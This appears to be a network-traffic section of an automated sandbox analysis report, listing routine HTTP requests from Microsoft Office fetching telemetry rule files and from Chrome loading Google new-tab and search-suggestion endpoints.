Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
